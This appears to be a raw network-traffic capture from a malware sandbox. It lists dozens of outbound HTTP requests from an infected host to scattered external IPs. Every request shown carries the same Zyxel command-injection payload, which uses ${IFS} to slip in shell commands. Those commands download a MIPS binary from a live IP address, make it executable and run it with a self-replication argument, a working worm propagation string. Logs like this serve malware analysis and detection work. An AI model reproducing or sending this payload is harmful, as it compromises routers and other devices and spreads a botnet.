                                    Jan 13, 2024 19:02:42.379148960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6566192.168.2.1333578168.127.244.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379220963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6567192.168.2.1357080223.28.81.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379273891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6568192.168.2.134298288.212.212.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379338026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6569192.168.2.135244820.73.0.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379399061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6570192.168.2.13448102.251.172.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379462957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6571192.168.2.13509461.169.201.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379549980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6572192.168.2.1345222167.94.138.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379607916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6573192.168.2.1333274108.101.246.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379662991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6574192.168.2.1350546163.230.108.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379729986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6575192.168.2.1343056180.253.194.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379792929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6576192.168.2.134058025.242.2.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379823923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6577192.168.2.1349386117.189.89.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.379941940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6578192.168.2.1359640141.102.29.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380023956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6579192.168.2.133574284.78.231.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380060911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6580192.168.2.135087217.106.13.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380094051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6581192.168.2.134759068.255.52.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380151987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6582192.168.2.1353822181.128.213.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380191088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6583192.168.2.1340262151.221.193.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380279064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6584192.168.2.1352922203.218.71.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380351067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6585192.168.2.134111069.6.75.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380414963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6586192.168.2.1356696185.39.208.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380431890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6587192.168.2.1344774219.222.21.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380502939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6588192.168.2.1352434143.101.76.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380594969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6589192.168.2.135484644.77.49.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380635977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6590192.168.2.1357048148.153.48.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380703926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6591192.168.2.135411298.129.94.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.380747080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6592192.168.2.1343192185.30.54.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386142015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6593192.168.2.13449345.10.74.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386184931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6594192.168.2.1345010164.253.129.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386225939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6595192.168.2.1342742218.54.189.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386306047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6596192.168.2.1342216161.123.43.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386352062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6597192.168.2.1355464175.41.103.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386410952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6598192.168.2.134846043.99.100.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386471987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6599192.168.2.1337462105.157.30.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386544943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6600192.168.2.133323251.101.145.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386588097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6601192.168.2.1347464192.31.250.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386632919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6602192.168.2.1339906120.116.73.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386686087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6603192.168.2.136007449.104.21.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386754990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6604192.168.2.134188835.174.33.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386815071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6605192.168.2.135661481.236.93.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:42.386887074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6606192.168.2.135828066.129.11.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393395901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6607192.168.2.1352410104.101.253.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393517971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6608192.168.2.1350548100.221.158.238443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393675089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6609192.168.2.1352254158.14.188.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393702984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6610192.168.2.1359568119.47.188.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393810034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6611192.168.2.1337216187.204.184.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393846035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6612192.168.2.1355382147.230.143.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393856049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6613192.168.2.1349332115.197.41.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393902063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6614192.168.2.1342892113.173.4.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393944025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6615192.168.2.1338668155.72.46.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.393996954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6616192.168.2.1358742198.189.222.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394073963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6617192.168.2.135303084.83.74.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394145966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6618192.168.2.134540862.63.231.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394207954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6619192.168.2.1342696185.128.10.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394268036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6620192.168.2.1343890192.174.165.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394323111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6621192.168.2.1355952131.240.56.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394392014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6622192.168.2.135351034.192.100.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394429922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6623192.168.2.134088673.0.229.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394515038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6624192.168.2.133566066.194.23.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394565105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6625192.168.2.1359936125.24.67.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394606113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6626192.168.2.1343482174.25.29.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394656897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6627192.168.2.134808041.110.202.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:43.394722939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    6628192.168.2.1334956150.85.91.29443
                                    TimestampBytes transferredDirectionData
